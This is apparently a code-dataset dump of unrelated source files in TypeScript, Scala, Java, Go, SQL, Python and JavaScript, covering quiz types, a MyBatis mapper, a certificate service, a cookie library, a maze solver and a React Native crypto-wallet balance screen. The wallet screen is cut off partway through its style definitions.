text stringlengths 1 1.05M |
|---|
<reponame>vovajr11/swf-client<gh_stars>1-10
/** Shape of a quiz document as delivered by the API. */
export type TQuiz = {
  _id: string;
  name: string;
  quizType: string;
  // FIX: `questions: []` is the *empty tuple* type in TypeScript, so a quiz
  // could never carry any questions. Widened to an array of unknown items;
  // narrow to a concrete question type once its schema is known.
  questions: unknown[];
};
/** Response wrapper for a list of quizzes. */
export interface IQuizzes {
  quizzes: TQuiz[];
}
/** Payload for persisting a user's quiz result. */
export interface ISaveResultQuiz {
  userId: string;
  quizId: string;
  quizName: string;
  quizType: string;
  // null presumably means "not yet scored" — TODO confirm against the backend.
  score: number | null;
  answers: string[];
}
/**
 * A quiz the user has completed. Mirrors ISaveResultQuiz minus the user id
 * (the user is implied by the requesting session).
 */
export interface ICompletedQuiz {
  quizId: string;
  quizName: string;
  quizType: string;
  // null presumably means "not yet scored" — TODO confirm against the backend.
  score: number | null;
  answers: string[];
}
|
<filename>ceplib/src/main/scala/dbis/piglet/cep/ops/MatchCollector.scala
package dbis.piglet.cep.ops
import dbis.piglet.cep.nfa.NFAStructure
import scala.reflect.ClassTag
import scala.collection.mutable.ListBuffer
import scala.collection.mutable.ArrayBuffer
import dbis.piglet.backends.{SchemaClass => Event}
/**
 * Accumulates the NFA runs (match sequences) produced during complex-event
 * processing and offers conversions of the collected matches.
 *
 * NOTE(review): "macth" is a typo for "match", but the field is public API of
 * this class, so the name is kept to avoid breaking callers.
 */
class MatchCollector[T <: Event: ClassTag] extends Serializable {
  var macthSequences: ListBuffer[NFAStructure[T]] = new ListBuffer()

  /** Appends a completed NFA run to the collected matches. */
  def +(that: NFAStructure[T]): Unit = macthSequences += that

  /** Number of match sequences collected so far. */
  def size: Int = macthSequences.size

  /** Flattens the events of all collected sequences into a single buffer. */
  def convertEventsToArray(): ArrayBuffer[T] = {
    // `val` instead of `var`: the buffer itself is mutated, never reassigned.
    val events: ArrayBuffer[T] = new ArrayBuffer()
    macthSequences.foreach(seq => events ++= seq.events)
    events
  }

  /** Single-element buffer: true iff at least one match was collected. */
  def convertEventsToBoolean(): ArrayBuffer[Boolean] =
    ArrayBuffer(macthSequences.nonEmpty) // idiomatic replacement for size > 0
}
package com.atjl.dbtiming.mapper.gen;
import com.atjl.dbtiming.domain.gen.GenTaskRuned;
import com.atjl.dbtiming.domain.gen.GenTaskRunedExample;
import java.util.List;
import org.apache.ibatis.annotations.Param;
/**
 * MyBatis mapper for {@code GenTaskRuned} rows (generator-style CRUD contract).
 * All {@code int} return values are affected-row counts.
 */
public interface GenTaskRunedMapper {
    /** Counts rows matching the example's criteria. */
    int countByExample(GenTaskRunedExample example);
    /** Deletes rows matching the example's criteria. */
    int deleteByExample(GenTaskRunedExample example);
    /** Deletes the row addressed by its primary key. */
    int deleteByPrimaryKey(Long tid);
    /** Inserts a full record (all columns, including nulls). */
    int insert(GenTaskRuned record);
    /** Inserts only the non-null fields of the record. */
    int insertSelective(GenTaskRuned record);
    /** Selects all rows matching the example's criteria. */
    List<GenTaskRuned> selectByExample(GenTaskRunedExample example);
    /** Selects the row addressed by its primary key (null when absent — MyBatis convention, confirm). */
    GenTaskRuned selectByPrimaryKey(Long tid);
    /** Updates only the non-null fields of {@code record} on rows matching {@code example}. */
    int updateByExampleSelective(@Param("record") GenTaskRuned record, @Param("example") GenTaskRunedExample example);
    /** Updates all columns from {@code record} on rows matching {@code example}. */
    int updateByExample(@Param("record") GenTaskRuned record, @Param("example") GenTaskRunedExample example);
    /** Updates only the non-null fields of the record addressed by its primary key. */
    int updateByPrimaryKeySelective(GenTaskRuned record);
    /** Updates all columns of the record addressed by its primary key. */
    int updateByPrimaryKey(GenTaskRuned record);
}
<filename>dto/certificate.go<gh_stars>1-10
package dto
import (
"crypto/x509"
"time"
"github.com/feeltheajf/ztca/pki"
)
var (
	// Certificates is the package-level entry point for certificate persistence.
	Certificates = &certificateService{}
)

// Certificate is the stored representation of an issued client certificate.
type Certificate struct {
	Model
	// Raw is the encoded certificate as produced by the PKI layer
	// (it is what pki.UnmarshalCertificate consumes in X509 below).
	Raw          string    `json:"raw"`
	SerialNumber string    `json:"serialNumber"`
	ExpiresAt    time.Time `json:"expiresAt"`
	// user metadata
	Username     string `json:"username"`
	DeviceSerial string `json:"deviceSerial"`
}
// X509 decodes the certificate stored in Raw and returns it as an
// *x509.Certificate. It panics if Raw cannot be unmarshalled: a persisted
// row with undecodable raw data indicates corrupted state, not a
// recoverable request error.
func (crt *Certificate) X509() *x509.Certificate {
	// FIX: the local result was named `x509`, shadowing the imported
	// crypto/x509 package within this function; renamed to `parsed`.
	parsed, err := pki.UnmarshalCertificate(crt.Raw)
	if err != nil {
		panic(err)
	}
	return parsed
}
// certificateService provides CRUD helpers over the package-level db handle.
type certificateService service

// Save persists a new certificate row.
func (cs *certificateService) Save(crt *Certificate) error {
	return db.Create(crt).Error
}

// Load returns the certificate stored for the given username.
// The returned *Certificate is non-nil even on error; check the error first.
func (cs *certificateService) Load(username string) (*Certificate, error) {
	crt := new(Certificate)
	return crt, db.Where("username = ?", username).First(crt).Error
}

// Delete removes the given certificate row.
func (cs *certificateService) Delete(crt *Certificate) error {
	return db.Delete(crt).Error
}
|
-- Average salary per employee name.
-- NOTE(review): grouping by (first_name, last_name) merges distinct employees
-- who happen to share a full name; if the table has a unique employee id,
-- grouping by that id would be safer — confirm against the schema.
SELECT
first_name,
last_name,
AVG(salary) AS average_salary
FROM employees
GROUP BY first_name, last_name;
#python main.py --model PACN --save pacn_X2 --scale 2 --reset --save_results --patch_size 96
#python main.py --model PACN --save pacn_X3 --scale 3 --reset --save_results --patch_size 144
#python main.py --model PACN --save pacn_X4 --scale 4 --reset --save_results --patch_size 192
#python main.py --model PACN --data_test Manga109 --scale 3 --pre_train ../experiment/model/pacn_X3.pt --test_only --save_results
|
---
---
// Third-party libraries, inlined at build time by Jekyll's include tag.
{% include js/jquery/jquery.slim.min.js %}
{% include js/moment/moment.min.js %}
{% include js/bootstrap/bootstrap.min.js %}
// Site helpers.
{% include js/abba/utils.js %}
// Run page initialisation once the DOM is ready.
$(document).ready(function() {
{% include js/abba/main.js %}
});
|
<reponame>zarly/props-and-cons
import {merge} from 'lodash'
import base from './default'
// Production configuration: the shared defaults with production-specific
// overrides applied on top.
//
// FIX: the original called merge(<overrides>, base). Lodash's merge gives
// precedence to *later* sources, so every key also present in the base
// config (e.g. `environment`) silently clobbered its production override,
// and the overrides literal was mutated as the destination. Merging into a
// fresh object with the overrides last restores the intended precedence.
export default merge({}, base, {
    environment: 'production',
    mongoose: 'mongodb://localhost:27017/props-and-cons-production',
    auth: {
        vkapp: {
            disableVerification: false,
        }
    },
    logging: {
        morganFormat: 'combined',
    },
});
|
import numpy as np
from astropy import coordinates as coord
def process_arguments(_args):
    """Normalise a heterogeneous argument sequence into a result list.

    Per item: numbers are squared, callables are invoked, empty lists are
    dropped, numpy arrays pass through unchanged, and ICRS coordinates are
    stringified. Anything else is silently ignored (original behaviour).
    """
    processed = []
    for item in _args:
        if isinstance(item, (int, float)):
            processed.append(item ** 2)
        elif callable(item):
            processed.append(item())
        elif isinstance(item, list) and not item:
            continue  # drop empty lists
        elif isinstance(item, np.ndarray):
            processed.append(item)
        elif isinstance(item, coord.ICRS):
            processed.append(str(item))
    return processed
# FIX: `_args` was referenced at module level without ever being defined,
# so importing this file crashed with NameError. Guard the demo behind
# __main__ and supply a concrete sample input.
if __name__ == "__main__":
    _args = [2, 3.0, (lambda: 1), []]
    processed_result = process_arguments(_args)
    print(processed_result)
<gh_stars>0
// Colour variants; the values double as CSS modifier / theme names.
export const Color = {
  DEFAULT: 'default',
  PRIMARY: 'primary',
  SUCCESS: 'success',
  DANGER: 'danger',
  WARNING: 'warning'
};
// Size variants; the values double as CSS modifier names.
export const Size = {
  LARGE: 'large',
  NORMAL: 'normal',
  SMALL: 'small',
  TINY: 'tiny'
};
|
import { Error } from 'http';
/**
 * Error describing a failed HTTP request.
 * NOTE(review): extends the `Error` imported from 'http' above — confirm that
 * module actually exports an Error class; the built-in global may be intended.
 * @extends Error
 */
export default class HTTPError extends Error {
  public status: number;
  public method: string;
  public name: string;
  constructor({ message, status }: Error, method: string, name?: string) {
    super(message);
    /**
     * Error name.
     * @type {string}
     */
    this.name = name || `[ REJECTION ] HTTPError`;
    /**
     * HTTP status code returned by the request (defaults to 500 when absent).
     * @type {number}
     */
    this.status = status ?? 500;
    /**
     * HTTP method used for the request.
     * @type {string}
     */
    this.method = method;
    /**
     * HTTP payload sent to the app.
     * @typedef {Object} HTTPErrorData
     * @property {*} json JSON data that was sent
     * @property {HTTPAttachmentData[]} files files sent along with this request, if any
     */
    /**
     * @TODO consider extending this
     *
     * Attachment data sent to the app.
     * @typedef {Object} HTTPAttachmentData
     * @property {string|Buffer|Stream} attachment raw attachment data
     * @property {string} name file name
     * @property {Buffer|Stream} file file buffer
     */
  }
}
|
<reponame>Ipxxiao/zax-cookie
/**
* Cookie module.
*/
/** Value accepted for cookie expiry (number offset, concrete Date, or unset). */
declare type DateType = number | Date | undefined;
/** Attributes that can be applied when setting or deleting a cookie. */
interface Attributes {
    /** Cookie path. */
    path: string;
    /** Cookie domain; undefined lets the browser default apply. */
    domain: string | undefined;
    /** Expiry for the cookie; omitted means a session cookie — confirm against implementation. */
    expires?: DateType;
    /** Restrict the cookie to HTTPS. */
    secure?: boolean;
    /** NOTE(review): httpOnly cannot be set from client-side script; verify this attribute is actually honoured. */
    httpOnly?: boolean;
    /** SameSite policy. */
    sameSite?: 'strict' | 'lax' | 'none';
    /** Max-age. NOTE(review): typed `any`; should likely be narrowed to `number` (seconds) — confirm. */
    'max-age'?: any;
}
/**
 * get domain
 *
 * Returns the current page's hostname.
 *
 * @example
 * ```js
 * getDomain()
 * //=> localhost
 * ```
 *
 * @returns {String}
 */
declare const getDomain: () => string | undefined;
/**
 * set cookie
 *
 * @example
 * ```js
 * setCookie('token', 'abc123')
 * //=> token=abc123; path=/; domain=localhost
 * ```
 *
 * @param key {String} cookie name to set
 * @param value {String} cookie value to set
 * @param attributes {Number | Object} number of days until expiry, or a full Attributes object
 *
 * @returns {String} the serialised cookie string (void on failure — confirm)
 */
declare const setCookie: (key: string, value: string, attributes?: number | Attributes | undefined) => string | void;
/**
 * get cookie
 *
 * @example
 * ```js
 * getCookie('token')
 * //=> abc
 * ```
 *
 * @param key {String} cookie name to read
 *
 * @returns {String}
 */
declare const getCookie: (key: string) => string | void;
/**
 * del cookie
 *
 * @example
 * ```js
 * delCookie('token')
 * ```
 *
 * @param key {String} cookie name to delete
 * @param attributes {Object} attributes (path/domain) that must match the cookie being deleted
 */
declare const delCookie: (key: string, attributes?: Attributes | undefined) => void;
/**
 * clear all cookie
 *
 * @example
 * ```js
 * clearCookie()
 * ```
 */
declare const clearCookie: () => void;
export { getDomain, setCookie, getCookie, delCookie, clearCookie, };
/**
 * Default export: the same functions under shorter aliases
 * (set/get/del/clear map to setCookie/getCookie/delCookie/clearCookie).
 */
declare const _default: {
    getDomain: () => string | undefined;
    set: (key: string, value: string, attributes?: number | Attributes | undefined) => string | void;
    get: (key: string) => string | void;
    del: (key: string, attributes?: Attributes | undefined) => void;
    clear: () => void;
};
export default _default;
|
<gh_stars>1-10
/*******************************************************************************
* Copyright (c) 2008 SAP AG.
* All rights reserved. This program and the accompanying materials
* are made available under the terms of the Eclipse License v1.0
* which accompanies this distribution, and is available at
* http://www.eclipse.org/legal/epl-v10.html
*
* Contributors:
* SAP AG - initial API and implementation
*******************************************************************************/
package org.eclipse.mat.snapshot.model;
import java.util.List;
/**
 * Interface for a plain vanilla object instance in the heap dump.
 *
 * @noimplement
 */
public interface IInstance extends IObject {
    /**
     * Returns all fields of the object.
     * <p>
     * Fields are ordered in such a way, that first fields defined in the current class and then fields of the super
     * class and its super classes are returned. This order is important to know, if a class declares a field by the
     * same name as the class it inherits from.
     *
     * @return the fields of this instance, own fields first, then inherited ones
     */
    List<Field> getFields();
    /**
     * Returns the field identified by the name.
     * <p>
     * If a class declares a member variable by the same name as the parent class does, then the result of this
     * method is undefined.
     *
     * @param name the field name to look up
     * @return the named field; undefined which one when the name is shadowed (see above)
     */
    Field getField(String name);
}
|
def solveMaze(maze):
    """Find the shortest path between the start and end points in a 2D maze.

    Open cells are marked with a space ``' '``; anything else is a wall.
    The path runs from the top-left corner (0, 0) to the bottom-right
    corner (rows-1, cols-1).

    Arguments:
        maze {2D array} -- 2D array representing a maze.
    Returns:
        list -- coordinates of the shortest path (start to end, inclusive),
        or None when no path exists.
    """
    # FIX: deque was used without ever being imported.
    from collections import deque

    # Guard degenerate input (no rows / no columns).
    if not maze or not maze[0]:
        return None
    rows, cols = len(maze), len(maze[0])
    start, goal = (0, 0), (rows - 1, cols - 1)
    # A walled start can never be on a path.
    if maze[0][0] != ' ':
        return None
    # FIX: the original appended the *current* cell once per expanded
    # neighbour, producing a jumbled visit trace rather than a path, and it
    # marked cells visited only when popped, so the same cell could be
    # enqueued many times. Standard BFS: mark on enqueue, record each cell's
    # parent, and walk the parents back from the goal.
    queue = deque([start])
    parents = {start: None}  # doubles as the visited set
    while queue:
        cell = queue.popleft()
        if cell == goal:
            path = []
            while cell is not None:
                path.append(cell)
                cell = parents[cell]
            return path[::-1]  # reverse: start -> goal
        r, c = cell
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if 0 <= nr < rows and 0 <= nc < cols \
                    and (nr, nc) not in parents and maze[nr][nc] == ' ':
                parents[(nr, nc)] = cell
                queue.append((nr, nc))
    # No route from start to goal.
    return None
<reponame>IrynaGrusha/trusteeWallet<gh_stars>0
/**
* @version 0.11
* @author yura
*/
import React, { Component } from 'react'
import { connect } from 'react-redux'
import { View, Text, Animated, TouchableOpacity, Image, Switch, Platform, Dimensions, PixelRatio } from 'react-native'
import AsyncStorage from '@react-native-community/async-storage'
import Entypo from 'react-native-vector-icons/Entypo'
import moment from 'moment'
import 'moment/min/locales.min'
import QRCodeBtn from '../../../assets/images/qrCodeBtn'
import NavStore from '../../../components/navigation/NavStore'
import ToolTips from '../../../components/elements/ToolTips'
import GradientView from '../../../components/elements/GradientView'
import LetterSpacing from '../../../components/elements/LetterSpacing'
import { setQRConfig, setQRValue } from '../../../appstores/Stores/QRCodeScanner/QRCodeScannerActions'
import { sublocale, strings } from '../../../services/i18n'
import Log from '../../../services/Log/Log'
import MarketingEvent from '../../../services/Marketing/MarketingEvent'
import { capitalize } from '../../../services/UI/Capitalize/Capitalize'
import { checkQRPermission } from '../../../services/UI/Qr/QrPermissions'
import { saveSelectedBasicCurrencyCode } from '../../../appstores/Stores/Main/MainStoreActions'
import WalletName from './WalletName/WalletName'
import settingsActions from '../../../appstores/Stores/Settings/SettingsActions'
import BlocksoftBN from '../../../../crypto/common/BlocksoftBN'
import BlocksoftUtils from '../../../../crypto/common/BlocksoftUtils'
import BlocksoftPrettyNumbers from '../../../../crypto/common/BlocksoftPrettyNumbers'
import { acc } from 'react-native-reanimated'
import BlocksoftCryptoLog from '../../../../crypto/common/BlocksoftCryptoLog'
import {showModal} from '../../../appstores/Stores/Modal/ModalActions'
import DaemonCache from '../../../daemons/DaemonCache'
// Screen metrics used to scale the card layout.
const { width: SCREEN_WIDTH } = Dimensions.get('window')
const PIXEL_RATIO = PixelRatio.get()
// Base spacing/radius unit for the wallet card.
let SIZE = 16
if (PIXEL_RATIO === 2 && SCREEN_WIDTH < 330) {
    SIZE = 8 // iphone 5s and similar small low-density screens
}
// Remembers the previously selected local currency while USD is toggled on.
let CACHE_PREV_CURRENCY = false
class WalletInfo extends Component {
constructor(props) {
super(props)
this.state = {
minus: 0,
progress: new Animated.Value(0),
opacity: new Animated.Value(1),
isViolet: false,
iconName: '',
styles
}
}
_oneFunction(cryptoCurrencies, selectedBasicCurrency, accountList) {
//MarketingEvent.setBalance(walletHash, 'TOTAL', totalBalanceString, { totalBalance, totalBalanceString, basicCurrencyCode: selectedBasicCurrency.currencyCode, walletHash })
}
// eslint-disable-next-line camelcase
async UNSAFE_componentWillMount() {
try {
moment.locale(sublocale())
AsyncStorage.getItem('isViolet').then(res => {
let isViolet = res
isViolet = isViolet !== null ? JSON.parse(isViolet) : false
this.setState(({
isViolet,
styles: isViolet ? stylesViolet : styles
}))
})
} catch (e) {
Log.err('HomeScreen.WalletInfo Unsafe mount error ' + e.message)
}
}
handleChangeLocal = async () => {
const selectedBasicCurrency = this.props.selectedBasicCurrency
Log.log('HomeScreen.WalletInfo handleChangeLocal', selectedBasicCurrency)
if (selectedBasicCurrency.currencyCode !== 'USD') {
if (CACHE_PREV_CURRENCY !== selectedBasicCurrency.currencyCode) {
await settingsActions.setSettings('local_currency_homescreen', selectedBasicCurrency.currencyCode)
CACHE_PREV_CURRENCY = selectedBasicCurrency.currencyCode
}
await saveSelectedBasicCurrencyCode('USD')
} else {
if (!CACHE_PREV_CURRENCY) {
CACHE_PREV_CURRENCY = await settingsActions.getSetting('local_currency_homescreen')
}
if (!CACHE_PREV_CURRENCY) {
CACHE_PREV_CURRENCY = 'UAH'
}
await saveSelectedBasicCurrencyCode(CACHE_PREV_CURRENCY)
}
}
handleScanQr = () => checkQRPermission(this.qrPermissionCallback)
qrPermissionCallback = () => {
Log.log('WalletInfo handleScanQr started')
setQRConfig({
name: strings('components.elements.input.qrName'),
successMessage: strings('components.elements.input.qrSuccess'),
type: 'MAIN_SCANNER'
})
setQRValue('')
NavStore.goNext('QRCodeScannerScreen')
}
toggleViolet = async () => {
await AsyncStorage.setItem('isViolet', JSON.stringify(!this.state.isViolet))
Animated.timing(this.state.opacity, {
toValue: 0,
duration: 300
}).start(() => {
this.setState({
isViolet: !this.state.isViolet,
styles: !this.state.isViolet ? stylesViolet : styles
}, () => {
Animated.timing(this.state.opacity, {
toValue: 1,
duration: 300
}).start()
})
})
}
renderTooltip = ({ styles }) => {
return (
<View style={styles.addAsset__content}>
<Entypo style={styles.addAsset__icon} size={13} name="plus"/>
<Text style={styles.addAsset__text}>
{strings('settings.assets.addAsset')}
</Text>
<Image
style={[styles.img__hor, styles.img__hor_right]}
resizeMode={'stretch'}
source={styles.img__paths.right}
/>
<Image
style={[styles.img__hor, styles.img__hor_left]}
resizeMode={'stretch'}
source={styles.img__paths.left}
/>
<Image
style={[styles.img__ver]}
resizeMode={'stretch'}
source={styles.img__paths.line}
/>
</View>
)
}
handlerRBF = async () => {
showModal({
type: 'RBF_ACTIVE',
icon: 'WARNING',
title: strings('modal.tbkModal.title'),
description: null,
},async () => {
const isActiveRBF = await AsyncStorage.getItem('RBF')
if (isActiveRBF === null || isActiveRBF.toString() === '0'){
await AsyncStorage.setItem('RBF', '1')
}else {
await AsyncStorage.setItem('RBF', '0')
}
})
}
render() {
const selectedWallet = this.props.selectedWallet
const selectedBasicCurrency = this.props.selectedBasicCurrency
let { styles } = this.state
let localCurrencySymbol = selectedBasicCurrency.symbol
if (!localCurrencySymbol) {
localCurrencySymbol = selectedBasicCurrency.currencyCode
}
const CACHE_SUM = DaemonCache.getCache(selectedWallet.walletHash)
let totalBalance = 0
if (CACHE_SUM) {
totalBalance = CACHE_SUM.balance
if (localCurrencySymbol !== CACHE_SUM.basicCurrencySymbol) {
localCurrencySymbol = CACHE_SUM.basicCurrencySymbol
}
}
let tmp = totalBalance.toString().split('.')
let totalBalancePrep1 = BlocksoftPrettyNumbers.makeCut(tmp[0]).separated
let totalBalancePrep2 = ''
if (typeof tmp[1] !== 'undefined') {
totalBalancePrep2 = '.' + tmp[1].substr(0, 2)
}
// @misha to optimize
const date = new Date()
const todayPrep = `${strings('homeScreen.today')}, ${date.getDate()} ${capitalize(moment(date).format('MMM'))}`
return (
<View style={{ ...styles.wrapper }}>
<View style={styles.top}>
<View style={{ width: 48, height: 25 }}>
{
Platform.OS === 'android' ?
<Switch
thumbColor="#fff"
trackColor={{ true: '#864DD9', false: '#dadada' }}
onValueChange={this.toggleViolet}
value={this.state.isViolet}/>
:
<Switch
trackColor={{ true: '#864DD9' }}
style={{ marginTop: -3, transform: [{ scaleX: .7 }, { scaleY: .7 }] }}
onValueChange={this.toggleViolet}
value={this.state.isViolet}/>
}
</View>
<View>
<WalletName
walletHash={selectedWallet.walletHash || ''}
walletNameText={selectedWallet.walletName || ''} />
</View>
<TouchableOpacity style={styles.qr} onPress={this.handleScanQr}>
<QRCodeBtn width={18} height={18}/>
</TouchableOpacity>
</View>
<Animated.View style={{ position: 'relative', width: '100%', paddingBottom: 20, opacity: this.state.opacity }}>
<View style={styles.container}>
<GradientView style={styles.container__bg} array={styles.containerBG.array} start={styles.containerBG.start} end={styles.containerBG.end}>
<View style={styles.container__top}>
<View style={styles.container__top__left}>
<Text style={styles.container__title}>
{strings('homeScreen.balance')}
</Text>
<LetterSpacing text={todayPrep} textStyle={styles.container__date} letterSpacing={1}/>
</View>
<TouchableOpacity style={styles.addAsset} onPress={() => NavStore.goNext('AddAssetScreen')} onLongPress={() => this.handlerRBF()} delayLongPress={2500}>
<ToolTips type={'HOME_SCREEN_ADD_CRYPTO_BTN_TIP'} height={100} MainComponent={this.renderTooltip} mainComponentProps={{ styles }}/>
</TouchableOpacity>
</View>
<View style={styles.walletInfo__content}>
<TouchableOpacity onPress={this.handleChangeLocal}>
<Text style={{ ...styles.walletInfo__text_small, ...styles.walletInfo__text_small_first }}>{localCurrencySymbol} </Text>
</TouchableOpacity>
<Text style={styles.walletInfo__text_middle}>{totalBalancePrep1}</Text>
<Text style={styles.walletInfo__text_small}>{totalBalancePrep2}</Text>
{/* <Feather name={iconName} style={styles.walletInfo__icon} /> */}
</View>
<View style={styles.container__text}>
{/* <LetterSpacing text={changedLastDay} textStyle={styles.container__text} letterSpacing={1} /> */}
</View>
</GradientView>
{
// this.props.isSnow ?
// <TouchableOpacity style={{ position: "absolute", bottom: 0, right: 0, padding: 16 }} onPress={this.props.toggleSnow}>
// <Fontisto style={styles.snowBtn__icon} name="snowflake-8" size={20} />
// </TouchableOpacity> : null
}
</View>
<View style={styles.shadow}>
<View style={styles.shadow__item}/>
</View>
</Animated.View>
{/* <View style={styles.container}> */}
{/* <View style={styles.top}> */}
{/* <Text style={styles.walletInfo__title}> */}
{/* { selectedWallet.wallet_name } */}
{/* </Text> */}
{/* </View> */}
{/* { */}
{/* /**/}
{/* <View style={{...styles.containerRow, marginTop: -20}}> */}
{/* <Text style={styles.bottomText}>- $ { +this.state.minus } ({ ((this.state.minus * 100) / totalBalance).toFixed(3) }%)</Text> */}
{/* <View style={styles.iconArrow}> */}
{/* <Icon name="ios-arrow-round-down" size={18} color="#fc5088" /> */}
{/* </View> */}
{/* </View> */}
{/* */}
{/* } */}
</View>
)
}
}
// Redux state consumed by this screen.
const mapStateToProps = (state) => {
    return {
        selectedWallet: state.mainStore.selectedWallet,
        selectedBasicCurrency: state.mainStore.selectedBasicCurrency,
        cryptoCurrencies: state.currencyStore.cryptoCurrencies,
        accountList: state.accountStore.accountList
    }
}
// Exposes raw dispatch; no bound action creators are needed here.
const mapDispatchToProps = (dispatch) => {
    return {
        dispatch
    }
}
export default connect(mapStateToProps, mapDispatchToProps)(WalletInfo)
const styles = {
wrapper: {
position: 'relative'
},
top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'center',
marginHorizontal: SIZE,
marginTop: Platform.OS === 'android' ? 35 : 0
},
top__title: {
fontFamily: 'Montserrat-Bold',
color: '#404040',
fontSize: 12
},
qr: {
paddingVertical: 13,
paddingHorizontal: 15
},
shadow: {
position: 'absolute',
top: 0,
left: 0,
width: '100%',
height: 127,
zIndex: 1
},
shadow__item: {
marginHorizontal: 22,
marginTop: 18,
height: 122,
backgroundColor: '#fff',
borderRadius: SIZE,
shadowColor: '#000',
shadowOffset: {
width: 0,
height: 5
},
shadowOpacity: 0.34,
shadowRadius: 6.27,
elevation: 10
},
container: {
position: 'relative',
height: 140,
marginHorizontal: SIZE,
// shadowOffset: {
// width: 0,
// height: 1
// },
// shadowOpacity: 0.22,
// shadowRadius: 2.22,
//
// elevation: 3,
backgroundColor: '#fff',
borderRadius: SIZE,
zIndex: 2
},
container__bg: {
flex: 1,
paddingLeft: SIZE - 1,
paddingBottom: SIZE - 1,
borderRadius: SIZE
},
container__top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'flex-start',
marginBottom: 4
},
container__title: {
marginTop: 14,
marginLeft: -1,
fontFamily: 'Montserrat-Bold',
color: '#404040',
fontSize: 14
},
container__text: {
color: '#939393',
fontFamily: 'SFUIDisplay-Bold',
fontSize: 8
},
container__date: {
marginTop: 2,
fontSize: 10,
fontFamily: 'SFUIDisplay-Semibold',
color: '#939393'
},
containerBG: {
array: ['#fff', '#f2f2f2'],
start: { x: 1, y: 0 },
end: { x: 1, y: 1 }
},
walletInfo__title: {
marginTop: 7,
color: '#f4f4f4',
fontSize: 12,
fontFamily: 'SFUIDisplay-Semibold'
},
containerRow: {
flexDirection: 'row',
alignItems: 'flex-start'
},
walletInfo__content: {
marginBottom: 8,
flexDirection: 'row',
alignItems: 'flex-end'
},
walletInfo__text_small: {
// height: 22,
fontSize: 20,
fontFamily: 'Montserrat-Medium',
color: '#404040',
// lineHeight: 25,
opacity: .8
},
walletInfo__text_small_first: {
marginRight: 5
},
walletInfo__text_middle: {
height: 42,
fontSize: 52,
fontFamily: 'Montserrat-Light',
color: '#404040',
lineHeight: 50
},
walletInfo__icon: {
marginLeft: 3,
marginBottom: Platform.OS === 'ios' ? -4.5 : -2,
color: '#939393',
fontSize: 28
},
img__paths: {
left: require('../../../assets/images/addAssetborderShadowLeft.png'),
right: require('../../../assets/images/addAssetborderShadowRight.png'),
line: require('../../../assets/images/addAssetborderShadowLines.png')
},
img__ver: {
flex: 1,
position: 'absolute',
top: -6,
left: 5,
width: '103%',
height: 39,
opacity: .5,
zIndex: 2
},
img__hor: {
flex: 1,
position: 'absolute',
top: -6,
width: 10,
height: 39,
opacity: .5,
zIndex: 2
},
img__hor_right: {
right: -5
},
img__hor_left: {
left: -5
},
addAsset: {
paddingVertical: 19,
paddingHorizontal: 15
},
addAsset__content: {
position: 'relative',
flexDirection: 'row',
alignItems: 'center',
height: 30,
paddingHorizontal: 8,
paddingVertical: 5,
paddingLeft: 4,
borderRadius: 6,
borderColor: '#864DD9',
borderWidth: 1.5
},
addAsset__text: {
fontSize: 10,
color: '#864DD9',
fontFamily: 'Montserrat-Bold'
},
addAsset__icon: {
marginRight: 2,
marginTop: 1,
color: '#864DD9'
},
snowBtn__icon: {
color: '#864DD9'
}
}
const stylesViolet = {
wrapper: {
position: 'relative'
},
top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'center',
marginHorizontal: SIZE,
marginTop: Platform.OS === 'android' ? 35 : 0
},
top__title: {
fontFamily: 'Montserrat-Bold',
color: '#404040',
fontSize: 12
},
qr: {
paddingVertical: 13,
paddingHorizontal: 15
},
shadow: {
position: 'absolute',
top: 0,
left: 0,
width: '100%',
height: 127,
zIndex: 1
},
shadow__item: {
marginHorizontal: 22,
marginTop: 18,
height: 122,
backgroundColor: '#fff',
borderRadius: SIZE,
shadowColor: '#000',
shadowOffset: {
width: 0,
height: 5
},
shadowOpacity: 0.34,
shadowRadius: 6.27,
elevation: 10
},
container: {
position: 'relative',
height: 140,
marginHorizontal: SIZE,
// shadowOffset: {
// width: 0,
// height: 1
// },
// shadowOpacity: 0.22,
// shadowRadius: 2.22,
//
// elevation: 3,
backgroundColor: '#fff',
borderRadius: SIZE,
zIndex: 2
},
container__bg: {
flex: 1,
paddingLeft: SIZE - 1,
paddingBottom: SIZE - 1,
borderRadius: SIZE
},
container__top: {
flexDirection: 'row',
justifyContent: 'space-between',
alignItems: 'flex-start',
marginBottom: 4
},
container__title: {
marginTop: 14,
marginLeft: -1,
fontFamily: 'Montserrat-Bold',
color: '#fff',
fontSize: 14
},
container__text: {
color: '#DCBAFB',
fontFamily: 'SFUIDisplay-Bold',
fontSize: 8
},
container__date: {
marginTop: 2,
fontSize: 10,
fontFamily: 'SFUIDisplay-Semibold',
color: '#DCBAFB'
},
containerBG: {
array: ['#9D4AA2', '#43156D'],
start: { x: 1, y: 0 },
end: { x: 1, y: 1 }
},
walletInfo__title: {
marginTop: 7,
color: '#f4f4f4',
fontSize: 12,
fontFamily: 'SFUIDisplay-Semibold'
},
containerRow: {
flexDirection: 'row',
alignItems: 'flex-start'
},
walletInfo__content: {
marginBottom: 8,
flexDirection: 'row',
alignItems: 'flex-end'
},
walletInfo__text_small: {
// height: 22,
fontSize: 20,
fontFamily: 'Montserrat-Medium',
color: '#F3E6FF',
// lineHeight: 25,
opacity: .8
},
walletInfo__text_small_first: {
marginRight: 5
},
walletInfo__text_middle: {
height: 42,
fontSize: 52,
fontFamily: 'Montserrat-Light',
color: '#fff',
lineHeight: 50
},
walletInfo__icon: {
marginLeft: 3,
marginBottom: Platform.OS === 'ios' ? -4.5 : -2,
color: '#DCBAFB',
fontSize: 28
},
img__paths: {
left: require('../../../assets/images/addAssetBorderShadowLeftLight.png'),
right: require('../../../assets/images/addAssetBorderShadowRightLight.png'),
line: require('../../../assets/images/addAssetBorderShadowLinesLight.png')
},
img__ver: {
flex: 1,
position: 'absolute',
top: -6,
left: 4,
width: '105%',
height: 38,
opacity: .5,
zIndex: 2
},
img__hor: {
flex: 1,
position: 'absolute',
top: -6,
width: 10,
height: 38,
opacity: .5,
zIndex: 2
},
img__hor_right: {
right: -5
},
img__hor_left: {
left: -5
},
addAsset: {
paddingVertical: 19,
paddingHorizontal: 15
},
addAsset__content: {
position: 'relative',
flexDirection: 'row',
alignItems: 'center',
height: 30,
paddingHorizontal: 8,
paddingVertical: 5,
paddingLeft: 4,
borderRadius: 6,
